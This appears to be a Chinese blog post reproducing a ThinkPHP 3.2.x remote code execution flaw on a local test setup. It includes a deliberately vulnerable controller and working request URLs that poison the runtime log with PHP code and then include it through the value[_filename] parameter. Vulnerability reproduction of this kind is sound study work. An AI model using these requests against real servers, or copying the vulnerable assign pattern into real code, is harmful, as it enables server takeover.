ThinkPHP 3.2.x RCE漏洞复现

漏洞介绍

ThinkPHP3.2远程代码执行漏洞，该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控，则导致模板路径变量被覆盖为携带攻击代码路径，造成文件包含，代码执行等危害。

漏洞复现

复现环境：phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10
一、搭建环境：
在ThinkPHP的Application\Home\Controller\IndexController.class.php
目录下写入模板赋值assign的 Demo
Demo:

<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller {public function index($value=''){$this->assign($value);$this->display();}}

在这里插入图片描述
写入demo后需要在view下创建一个index文件进行视图渲染
目录：\Application\Home\View\Index\index.html

Log记录目录：
若开启debug模式日志会到：\Application\Runtime\Logs\Home\下
若未开启debug模式日志会到：\Application\Runtime\Logs\Common\下

二、漏洞利用
1、创建log文件

http://127.0.0.1/thinkphp/index.php?m=--><?=phpinfo();?>

在这里插入图片描述
2、包含log文件

http://127.0.0.1/thinkphp/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/common/21_07_12.log

在这里插入图片描述

3、上传具有恶意代码的任何文件到服务器上，直接包含其文件相对或绝对路径即可。
例如：http://127.0.0.1/thinkphp/index.php?m=Home&c=Index&a=index&value[_filename]=./[filename]

参考链接

https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

{{item.like > 0 ? item.like : '点赞'}} {{item.comment_content_show ? '取消' : '回复'}} 删除

回帖

{{reply.like > 0 ? reply.like : '点赞'}} {{reply.comment_content_show ? '取消' : '回复'}} 删除

收起